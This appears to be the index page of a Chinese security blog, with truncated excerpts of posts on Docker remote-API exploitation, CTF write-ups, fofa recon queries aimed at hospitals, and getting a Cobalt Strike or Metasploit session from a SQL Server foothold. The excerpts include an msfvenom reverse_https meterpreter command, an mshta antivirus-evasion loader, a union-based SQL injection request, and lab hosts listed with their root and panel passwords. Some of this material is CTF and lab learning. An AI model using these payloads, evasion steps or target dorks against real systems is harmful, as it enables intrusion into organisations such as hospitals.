k8s学习及漏洞复现-下
1.1docker remote api (2375)k8s与docker总是并行出现的,那么如果docker出现问题,也将是严重的。这里笔者学习复现一下docker的漏洞,docker远程访问漏洞。fofa指纹app="docker-Daemon" shodan **port:”2375″ country:”JP” Docker**测试是否存在漏洞,这里可以看到,fofa出来的并不是都是2375端口,也可能是附近的,都一样,正常是404,然后加个version,或者2376/containers/json出现信息,也可证明存在漏洞
也可以使用命令进行获取到相关容器。
1.2搭建本地漏洞接下来的操作没有授权,就搭建了一个环境,使用vulhub搭建,很方便。https://github.com/vulhub/vulhub,安装完docker即可
123cd /vulhub/docker/unauthorized-rcedocker-compose builddocker-compose up -d
这里我们pull一个镜像,这里报了一个错,Using defa ...
k8s学习及漏洞复现-上
k8s基础知识常见的pod状态
pod
pod常见的状态:第一阶段:挂起(Pending):1、正在创建Pod但是Pod中的容器还没有全部被创建完成,处于此状态的Pod应该检查Pod依赖的存储是否有权限挂载、镜像是否可以下载、调度是否正常等2、我们在请求创建pod时,条件不满足,调度没有完成,没有任何一个节点能满足调度条件,已经创建了pod但是没有适合它运行的节点叫做挂起,调度没有完成。
失败(Failed):Pod 中的所有容器都已终止了,并且至少有一个容器是因为失败终止。也就是说,容器以非0状态退出或者被系统终止。未知(Unknown):未知状态,所谓pod是什么状态是apiserver和运行在pod节点的kubelet进行通信获取状态信息的,如果节点之上的kubelet本身出故障,那么apiserver就连不上kubelet,得不到信息了,就会看Unknown,通常是由于与pod所在的node节点通信错误。
Error 状态:Pod 启动过程中发生了错误
成功(Succeeded):Pod中的所有容器都被成功终止,即pod里所有的containers均已terminated。
已 ...
polarctfweb刷题记录
misc0和255给到一个py文件,是图片生成坐标点的,也给了坐标点,找chatgpt问一下还原一下代码
12345678910111213141516171819from PIL import Image# 输入坐标点列表image_list = [[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255], [255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255], [255, 255, 255, 255, 255, 255, 255, 255, ...
shizhanzhongdeyixietips
fofa1234567891011121314151617181920country="CN"&&(title="医疗"||title="医院")&&city="山东"title="目标名称" && region="shandong" city="jinan"(title="医院" || title="医疗" || title="卫生健康"|| title="卫健委" || body="医疗")&& region="山东省" cert="目标域名或者证书关键字" && region="xx省" cert="医疗" && city="济南市" ((title= ...
NewStarCTF2023公开赛道WEEK3
webInclude 🍐经典文件包含写shell,进行rce,
12345678910111213141516<?php error_reporting(0); if(isset($_GET['file'])) { $file = $_GET['file']; if(preg_match('/flag|log|session|filter|input|data/i', $file)) { die('hacker!'); } include($file.".php"); # Something in phpinfo.php! } else { highlight_file(__FILE__); }?>
打phpinfo的时候,是存在假flag的的,f ...
sqlserver上线csormsf
当我没拿到一个sqlserver的权限时,权限很小,且有waf的情况下,且只能透过web执行命令,上线到msf或者cs。
先看一下杀软
很多,还有国外的。
这里采用mshta免杀上线,参考文章https://www.zhihuifly.com/t/topic/2534
首先整个模板文件https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta,在这个里,
然后使用cs 或者msf生成一个raw 文件
msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=3333 -f raw -o payload.bin
cs attacks
这里注意是32位的
然后cat payload.bin | base64 -w 0
把得到的内容写进模板里
然后起一个python服务器即可,
msf的要起监听
use exploit/multi/handler
payload 换掉 s ...
cfs
root密码:teamssix.com
此主机的IP地址:192.168.1.11192.168.22.11
宝塔后台登陆地址及密码:地址:http://192.168.1.11:8888/a768f109/账号:eaj3yhsl密码:41bb8fee
root密码:teamssix.com
此主机的IP地址:192.168.22.22192.168.33.22
宝塔后台登陆地址及密码:地址:http://192.168.22.22:8888/2cc52ec0/账号:xdynr37d密码:123qwe..
GET /index.php?r=vul&keyword=1’ union%20select%20database(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39–%20123http://192.168.22.129/index.php?r=vul&keyword=1' union selec ...
NewStarCTF2023公开赛道WEEK2
NewStarCTF 2023 公开赛道 WEEK2REVERSEWEEK2|REVERSE PZthon
下载文件,看起来像是py文件,py文件的话拖ida是不行的,至于为什么不行,我也不知道,大佬说的,
拖到ida里,也不行,太多东西了。
https://github.com/extremecoders-re/pyinstxtractor
可以使用这个python exe 反编译工具进行反编译,
python3 .\pyinstxtractor.py ..\PZthon\PZthon.exe
解出来之后会看到这个文件名的以pyc为后缀的文件,拿到这个pyc反编译的网站,https://tool.lu/pyc/
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989 ...
谋集团ctf
压缩包大师很简单的压缩包套娃,密码是压缩包的密码python脚本whindows,但是解压很慢
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139import zipfileimport osimport py7zrimport rarfile#a = py7zr.SevenZipFile(r'e:\test.7z','r')count=0 # now = "D:\\vscod ...